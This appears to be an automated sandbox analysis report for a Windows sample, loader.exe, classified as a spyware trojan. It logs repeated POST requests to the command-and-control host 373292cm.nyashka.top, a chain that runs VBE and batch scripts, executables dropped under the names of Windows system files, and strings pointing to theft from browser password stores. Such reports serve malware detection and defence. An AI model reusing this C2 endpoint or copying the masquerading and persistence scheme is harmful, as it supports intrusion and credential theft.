                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1, Content-Type: application/x-www-form-urlencoded, User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0, Host: 373292cm.nyashka.top, Content-Length: 2544, Expect: 100-continue
                                    Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1, Content-Type: application/x-www-form-urlencoded, User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0, Host: 373292cm.nyashka.top, Content-Length: 1852, Expect: 100-continue, Connection: Keep-Alive
                                    Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic; DNS traffic detected: DNS query: 373292cm.nyashka.top
                                    Source: unknown; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1, Content-Type: application/x-www-form-urlencoded, User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0, Host: 373292cm.nyashka.top, Content-Length: 344, Expect: 100-continue, Connection: Keep-Alive
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://373292cm.nyP
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://373292cm.nyPR
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://373292cm.nyashka.top
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://373292cm.nyashka.top/
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, loader.exe, 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://www.enigmaprotector.com/
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://www.enigmaprotector.com/openU
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico https://www.ecosia.org/search?q=
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://ch.search.yahoo.com/favicon.ico https://ch.search.yahoo.com/search
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://duckduckgo.com/favicon.ico https://duckduckgo.com/?q=
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe; Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: loader.exe; Static PE information: section name:
                                    Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\loader.exe; Code function: 0_2_04FF6859 NtQueryInformationProcess,GetSystemInfo,0_2_04FF6859
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe; File created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe; File created: C:\Windows\Performance\WinSAT\DataStore\b8bba6a6aa94c9
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe; File created: C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe; File created: C:\Windows\DiagTrack\Scenarios\21b1a557fd31cc
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe; File created: C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe; File created: C:\Windows\LiveKernelReports\9e8d7a4ca61bd9
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File deleted: C:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BLdnhdFQ.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 006C4264 appears 65 times
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0064EB78 appears 36 times
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0064F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0064EC50 appears 55 times
                                    Source: kmFpzVgz.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: keVXUmFt.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: SSuSBQke.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: BLdnhdFQ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ZPhRdffT.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: PHEbWhMM.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: JgiUHXBa.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: pOvooSqL.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: XCTiUwVw.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: OTzTkTQO.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: loader.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs loader.exe
                                    Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: chainPorthostCommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: tQESKTdysPpsVzUyXTE.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: conhost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: dasHost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: csrss.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: RuntimeBroker.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: loader.exeStatic PE information: Section: ZLIB complexity 0.997276135089686
                                    Source: loader.exeStatic PE information: Section: ZLIB complexity 0.9948459201388888
                                    Source: loader.exeStatic PE information: Section: cheat ZLIB complexity 0.9968048443434617
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@35/291@2/1
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Program Files (x86)\microsoft\csrss.exe
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\kmFpzVgz.log
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-eaeo9JEo1ruqi45TCDYM
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\AppData\Local\Temp\xiz5tqzr
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: sfxname0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: sfxstime0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: STARTDLG0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: xzh0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                    Source: loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\loader.exeFile read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: CwbJ0mVCgt.17.dr, de3RQno5mm.17.dr, 0bAGSaIloU.17.dr, 71vf3aESwR.17.dr, nl7holVoK2.17.dr, 2xjfsQZ2Oh.17.dr, wZSuZ37Yxz.17.dr, bZmkMsPMuF.17.dr, iftkGTBA3n.17.dr, NXEWuyzxbY.17.dr, baAXtHnJu8.17.dr, WiIfdSYJo8.17.dr, WTJCl3vkX0.17.dr, HLtjQkDKgJ.17.dr, 7y7NgGczeq.17.dr, Nk3oF5AD7f.17.dr, inxWYTeNR8.17.dr, onXF6bxSWi.17.dr, Jup0iOChsz.17.dr, qDslv6SWQW.17.dr, AoeS8TOKyQ.17.dr, OlgNRJm9Kj.17.dr, mBv65Tg9xT.17.dr, DkSlZcNwi8.17.dr, 9YDkCEequl.17.dr, iXT0uoDdar.17.dr, mbBd912zD4.17.dr, tj5OZvDMsQ.17.dr, hVZA6YWOjg.17.dr, FlcsZpruRo.17.dr, ZrvfXFqFfB.17.dr, UMuv3DhKb6.17.dr, fulGOXAGc3.17.dr, SdOOWi3B5L.17.dr, 4n1B3EoqiD.17.dr, m5SDxSfTeE.17.dr, 4vX6yEeh4Q.17.dr, cJbHqVw7Nd.17.dr, 3hDm9jrtsr.17.dr, dBG31pxIKN.17.dr, 0kpuNgfS4z.17.dr, F5v0I4Bo7c.17.dr, jdeF0Imnon.17.dr, rRwKpR0eEh.17.dr, Ap5qYhZPvf.17.dr, KxTBxmfuHr.17.dr, BVY4CFkbFp.17.dr, uuegMOlRWI.17.dr, SYXCZQInFG.17.dr, pBAzMx9yU8.17.dr, rXYOrxVmy8.17.dr, XIKz5h0d1S.17.dr, U8s1VXJGab.17.dr, mLyVdUoRER.17.dr, g0cnN19Ln3.17.dr, 4C8vlfUZLp.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: loader.exeVirustotal: Detection: 76%
                                    Source: loader.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\loader.exeFile read: C:\Users\user\Desktop\loader.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
                                    Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"
